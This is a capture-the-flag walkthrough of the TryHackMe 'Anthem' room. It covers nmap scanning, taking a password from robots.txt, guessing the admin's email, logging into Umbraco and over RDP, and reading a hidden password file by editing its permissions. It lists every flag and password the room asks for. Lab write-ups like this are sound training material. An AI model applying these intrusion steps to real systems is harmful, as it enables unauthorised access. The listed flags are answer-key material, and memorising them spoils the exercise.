Task 1: Website Analysis
I performed an nmap scan to find open ports on the machine.
$ nmap -A -T4 -p- 10.10.80.56 -Pn
This is what the nmap flags stand for:
-A All i.e. Enable OS detection, version detection, script scanning, and traceroute
-T4 the speed template, these templates are what tells nmap how quickly to perform the scan. The speed template ranges from 0 for slow and stealthy to 5 for fast and obvious.
-p- Scan all Transmission Control Protocol (TCP) ports: 1-65535
-Pn Treat all hosts as online -- skip host discovery
Results of the nmap scan continued Question 2: What port is for the web server? 80
Question 3: What port is for remote desktop service? 3389
I decide to check out their website.
Snippet of the website homepage Viewing their page source reveals nothing interesting. Except maybe the highlighted placeholder below:
Page source with weird placeholder From the nmap results above, we know they have a robots.txt file with disallowed entries. I decide to open it up.
Question 4: What is a possible password in one of the pages web crawlers check for? UmbracoIsTheBest!
I decide to run view all the disallowed directories to see if I can find anything interesting. But before that, I decide to Google Umbraco.
Built upon Microsoft's .NET Framework, Umbraco is a completely free, Open Source Content Management System (CMS).
https://www.unskinned.net/umbraco-cms
So now I know the website is powered by Umbraco CMS.
Question 5: What CMS is the website using? Umbraco
Question 6: What is the domain of the website: Anthem.com
When I visit the /bin web page, I get a blank screen. When I visit both the /config and /umbraco_client web pages, I am redirected to the homepage of the website. However, the /umbraco web page reveals a login form.
Login form for /umbraco web page I haven't found any login credentials on the site so far. I decide to google whether Umbraco CMS has any default credentials. However, none of the default credentials work.
I decide to do further recon.
Questions 7-8
It gets a bit trickier here as the room is gaining more and more CTF tasks. In this case, admin’s name is not directly stated on the website, but it contains enough information to get it.
Use the search bar to look for anything related to admin. We found an article in archives! IP/archive/a-cheers-to-our-it-department/
We can see a strange poem in the article.
The poem on one of the articles Let’s google it!
Result of our Google search Question 7: What is the name of the Administrator? Solomon Grundy
Question 8 is about finding the email of the administrator. In another article on the web page, we can decipher the email pattern.
Deciphering email pattern Since our administrator is called Solomon Grundy, we can assume his email address is SG@anthem.com
Question 8: Can we find the email address of the administrator? SG@anthem.com
I head back to the login page and type in the admin's email as well as the password we found on the /robots.txt file.
Login form with credentials The new credentials enable us to successfully login to the administration section of the Umbraco CMS.
Umbraco CMS Admin section Task 2: Spot the Flags
Flag 1: THM{L0L_WH0_US3S_M3T4}
I found flag one under the 'Meta Tags' section under the 'We are Hiring' blog post. See the image below.
Flag 2: THM{G!T_G00D}
I found this flag on the page source of the website.
Flag 3: THM{L0L_WH0_D15}
I found this flag after clicking on Redirect URL Management and on the link /authors/jane-doe/
Redirect URL Management Page Once I did that, I was taken to Jane's page where I found the flag.
Jane's Author Page with Flag FLAG 4: THM{AN0TH3R_M3TA}
I found flag 4 under the 'Meta Tags' section under one of the site's blog posts.
Task 3: Final Stage
Using the login credentials we found in task 1, we can RDP (Remote Desktop Protocol) into the Windows Server.
$ rdesktop IP
Username: sg Password: UmbracoIsTheBest!
And we are succesful.
Remote Desktop of the Windows Machine On the desktop, we notice a user.txt file On opening it, we find another flag.
A flag on the user.txt file Next we need to find the admin password. The hint given on TryHackMe is "It is Hidden". This hint gives us a direct approach to what we need to do. Use the search bar to find Control Panel and open File Explorer Options. Turn on Show Hidden Files and save your settings. As you might have guessed, we can see some hidden files and folders now. Go to the C:\ drive and look if you see anything strange. Folder backup looks promising. We can see a file called ‘restore’ in there.
Here we get to the most interesting part. We can’t read or write on this file, but for some reason, we can edit the permissions on it. Right click on the file, select Properties, Click on the Security Tab, click on Advanced, and simply add yourself (username) to the permissions tab, therefore allowing yourself to access the file. If you need any help, simply Google how to add a user in Permissions.
How to add yourself as a user Finally, open it up and read the password.
Now we have to elevate our privileges to admin in order to read the contents of the root.txt file. I navigate to the Admin desktop. (see image below)
File path to the Administrator Desktop When prompted for the password, I type in: ChangeMeBaby1MoreTime I can now access the contents of the root.txt file
My biggest issue with the room is that it was a little too "ctfy" for my liking. This resulted in a lot of guess-work or peeking at other writeups because one was never sure what the next step is (I am a big believer that rooms should be realistic). Otherwise, I found it pretty okay. I especially liked how we needed to figure out the email convention of Anthem, and RDP-ing into the WIndows Machine (a first for me).
Further Research On My Part
Familiarize myself with RDP (Setup RDP on my machine, then access it using a different machine. From the same network and also from a different one. Figure out how to secure RDP too)
Next time I need a website, I will consider Umbraco. It looks better than Wordpress.
